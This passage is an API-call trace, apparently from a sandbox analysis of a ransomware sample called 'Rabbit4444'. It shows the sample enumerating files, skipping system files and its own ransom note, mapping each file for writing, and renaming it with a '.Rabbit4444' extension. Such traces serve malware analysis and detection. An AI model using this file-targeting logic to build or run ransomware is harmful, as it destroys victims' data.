(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}", dwFileAttributes=0x0) returned 1 [0068.440] lstrlenW (lpString="{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}") returned 38 [0068.440] lstrlenW (lpString="Rabbit4444") returned 10 [0068.440] lstrcmpiW (lpString1="D8854F051}", lpString2="Rabbit4444") returned -1 [0068.440] lstrlenW (lpString=".dll") returned 4 [0068.440] lstrcmpiW (lpString1="051}", lpString2=".dll") returned 1 [0068.440] lstrlenW (lpString=".lnk") returned 4 [0068.440] lstrcmpiW (lpString1="051}", lpString2=".lnk") returned 1 [0068.440] lstrlenW (lpString=".ini") returned 4 [0068.440] lstrcmpiW (lpString1="051}", lpString2=".ini") returned 1 [0068.440] lstrlenW (lpString=".sys") returned 4 [0068.440] lstrcmpiW (lpString1="051}", lpString2=".sys") returned 1 [0068.441] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{d750f1b1-b0b7-4da6-a9c0-1abd8854f051}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.441] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.441] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15975163768) returned 1 [0068.441] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.441] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0068.441] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0068.441] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.442] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.443] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.443] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0068.443] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.443] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0068.443] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0068.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0068.444] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15975503155) returned 1 [0068.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0068.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0068.444] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.445] CloseHandle (hObject=0x29c) returned 1 [0068.445] CloseHandle (hObject=0x280) returned 1 [0068.445] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}.Rabbit4444") returned 156 [0068.445] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{d750f1b1-b0b7-4da6-a9c0-1abd8854f051}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D750F1B1-B0B7-4DA6-A9C0-1ABD8854F051}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{d750f1b1-b0b7-4da6-a9c0-1abd8854f051}.rabbit4444"), dwFlags=0x1) returned 1 [0068.445] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c146ede, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c146ede, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}", cAlternateFileName="{D7B78~1")) returned 1 [0068.445] lstrcmpiW (lpString1="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.445] lstrcmpiW (lpString1="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.446] lstrcmpiW (lpString1="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}", lpString2="Rabbit4444.exe") returned -1 [0068.446] lstrcmpiW (lpString1="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}", lpString2=".") returned 1 [0068.446] lstrcmpiW (lpString1="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}", lpString2="..") returned 1 [0068.446] lstrcmpiW (lpString1="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}", lpString2="windows") returned -1 [0068.446] lstrcmpiW (lpString1="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}", lpString2="bootmgr") returned -1 [0068.446] lstrcmpiW (lpString1="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}", lpString2="pagefile.sys") returned -1 [0068.446] lstrcmpiW (lpString1="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}", lpString2="boot") returned -1 [0068.446] lstrcmpiW (lpString1="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}", lpString2="ids.txt") returned -1 [0068.446] lstrcmpiW (lpString1="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}", lpString2="NTUSER.DAT") returned -1 [0068.446] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}" | out: lpString1="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}") returned="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}" [0068.446] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D7B78AAA-A1E8-4680-A688-037B9A274D5A}", dwFileAttributes=0x0) returned 1 [0068.446] lstrlenW (lpString="{D7B78AAA-A1E8-4680-A688-037B9A274D5A}") returned 38 [0068.446] lstrlenW (lpString="Rabbit4444") returned 10 [0068.446] lstrcmpiW (lpString1="B9A274D5A}", lpString2="Rabbit4444") returned -1 [0068.446] lstrlenW (lpString=".dll") returned 4 [0068.446] lstrcmpiW (lpString1="D5A}", lpString2=".dll") returned 1 [0068.446] lstrlenW (lpString=".lnk") returned 4 [0068.446] lstrcmpiW (lpString1="D5A}", lpString2=".lnk") returned 1 [0068.446] lstrlenW (lpString=".ini") returned 4 [0068.446] lstrcmpiW (lpString1="D5A}", lpString2=".ini") returned 1 [0068.446] lstrlenW (lpString=".sys") returned 4 [0068.446] lstrcmpiW (lpString1="D5A}", lpString2=".sys") returned 1 [0068.446] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D7B78AAA-A1E8-4680-A688-037B9A274D5A}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{d7b78aaa-a1e8-4680-a688-037b9a274d5a}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.447] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.447] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15975753866) returned 1 [0068.447] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.447] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0068.447] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0068.447] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.451] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0068.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0068.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0068.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0068.452] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15976303059) returned 1 [0068.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0068.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0068.452] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.453] CloseHandle (hObject=0x29c) returned 1 [0068.453] CloseHandle (hObject=0x280) returned 1 [0068.453] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D7B78AAA-A1E8-4680-A688-037B9A274D5A}.Rabbit4444") returned 156 [0068.453] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D7B78AAA-A1E8-4680-A688-037B9A274D5A}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{d7b78aaa-a1e8-4680-a688-037b9a274d5a}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{D7B78AAA-A1E8-4680-A688-037B9A274D5A}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{d7b78aaa-a1e8-4680-a688-037b9a274d5a}.rabbit4444"), dwFlags=0x1) returned 1 [0068.453] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c73cc7d, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c73cc7d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}", cAlternateFileName="{DC3F0~1")) returned 1 [0068.453] lstrcmpiW (lpString1="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.453] lstrcmpiW (lpString1="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.453] lstrcmpiW (lpString1="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}", lpString2="Rabbit4444.exe") returned -1 [0068.454] lstrcmpiW (lpString1="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}", lpString2=".") returned 1 [0068.454] lstrcmpiW (lpString1="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}", lpString2="..") returned 1 [0068.454] lstrcmpiW (lpString1="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}", lpString2="windows") returned -1 [0068.454] lstrcmpiW (lpString1="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}", lpString2="bootmgr") returned -1 [0068.454] lstrcmpiW (lpString1="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}", lpString2="pagefile.sys") returned -1 [0068.454] lstrcmpiW (lpString1="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}", lpString2="boot") returned -1 [0068.454] lstrcmpiW (lpString1="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}", lpString2="ids.txt") returned -1 [0068.454] lstrcmpiW (lpString1="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}", lpString2="NTUSER.DAT") returned -1 [0068.454] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}" | out: lpString1="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}") returned="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}" [0068.454] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}", dwFileAttributes=0x0) returned 1 [0068.454] lstrlenW (lpString="{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}") returned 38 [0068.454] lstrlenW (lpString="Rabbit4444") returned 10 [0068.454] lstrcmpiW (lpString1="EB37783E0}", lpString2="Rabbit4444") returned -1 [0068.454] lstrlenW (lpString=".dll") returned 4 [0068.454] lstrcmpiW (lpString1="3E0}", lpString2=".dll") returned 1 [0068.454] lstrlenW (lpString=".lnk") returned 4 [0068.454] lstrcmpiW (lpString1="3E0}", lpString2=".lnk") returned 1 [0068.454] lstrlenW (lpString=".ini") returned 4 [0068.454] lstrcmpiW (lpString1="3E0}", lpString2=".ini") returned 1 [0068.454] lstrlenW (lpString=".sys") returned 4 [0068.454] lstrcmpiW (lpString1="3E0}", lpString2=".sys") returned 1 [0068.454] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{dc3f0dd8-0793-4fbb-8e32-717eb37783e0}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.455] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.455] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15976552354) returned 1 [0068.455] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.455] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0068.455] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0068.455] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.456] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.457] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.457] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0068.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.457] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0068.457] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0068.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0068.457] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15976816637) returned 1 [0068.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0068.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0068.458] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.458] CloseHandle (hObject=0x29c) returned 1 [0068.458] CloseHandle (hObject=0x280) returned 1 [0068.458] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}.Rabbit4444") returned 156 [0068.458] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{dc3f0dd8-0793-4fbb-8e32-717eb37783e0}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{DC3F0DD8-0793-4FBB-8E32-717EB37783E0}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{dc3f0dd8-0793-4fbb-8e32-717eb37783e0}.rabbit4444"), dwFlags=0x1) returned 1 [0068.459] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38231567, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x38231567, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}", cAlternateFileName="{E0AD8~1")) returned 1 [0068.459] lstrcmpiW (lpString1="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.459] lstrcmpiW (lpString1="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.459] lstrcmpiW (lpString1="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}", lpString2="Rabbit4444.exe") returned -1 [0068.459] lstrcmpiW (lpString1="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}", lpString2=".") returned 1 [0068.459] lstrcmpiW (lpString1="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}", lpString2="..") returned 1 [0068.459] lstrcmpiW (lpString1="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}", lpString2="windows") returned -1 [0068.459] lstrcmpiW (lpString1="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}", lpString2="bootmgr") returned -1 [0068.459] lstrcmpiW (lpString1="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}", lpString2="pagefile.sys") returned -1 [0068.459] lstrcmpiW (lpString1="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}", lpString2="boot") returned -1 [0068.459] lstrcmpiW (lpString1="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}", lpString2="ids.txt") returned -1 [0068.459] lstrcmpiW (lpString1="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}", lpString2="NTUSER.DAT") returned -1 [0068.459] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}" | out: lpString1="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}") returned="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}" [0068.459] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}", dwFileAttributes=0x0) returned 1 [0068.459] lstrlenW (lpString="{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}") returned 38 [0068.459] lstrlenW (lpString="Rabbit4444") returned 10 [0068.459] lstrcmpiW (lpString1="6CD8C752F}", lpString2="Rabbit4444") returned -1 [0068.459] lstrlenW (lpString=".dll") returned 4 [0068.459] lstrcmpiW (lpString1="52F}", lpString2=".dll") returned 1 [0068.459] lstrlenW (lpString=".lnk") returned 4 [0068.459] lstrcmpiW (lpString1="52F}", lpString2=".lnk") returned 1 [0068.459] lstrlenW (lpString=".ini") returned 4 [0068.459] lstrcmpiW (lpString1="52F}", lpString2=".ini") returned 1 [0068.459] lstrlenW (lpString=".sys") returned 4 [0068.460] lstrcmpiW (lpString1="52F}", lpString2=".sys") returned 1 [0068.460] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{e0ad878d-b374-40fc-b27f-1ea6cd8c752f}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.460] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.460] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15977069249) returned 1 [0068.460] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.460] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0068.460] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0068.460] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.461] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0068.462] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0068.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0068.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0068.463] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15977368767) returned 1 [0068.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0068.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0068.463] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.464] CloseHandle (hObject=0x29c) returned 1 [0068.464] CloseHandle (hObject=0x280) returned 1 [0068.464] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}.Rabbit4444") returned 156 [0068.464] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{e0ad878d-b374-40fc-b27f-1ea6cd8c752f}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E0AD878D-B374-40FC-B27F-1EA6CD8C752F}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{e0ad878d-b374-40fc-b27f-1ea6cd8c752f}.rabbit4444"), dwFlags=0x1) returned 1 [0068.465] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c762ee8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c762ee8, 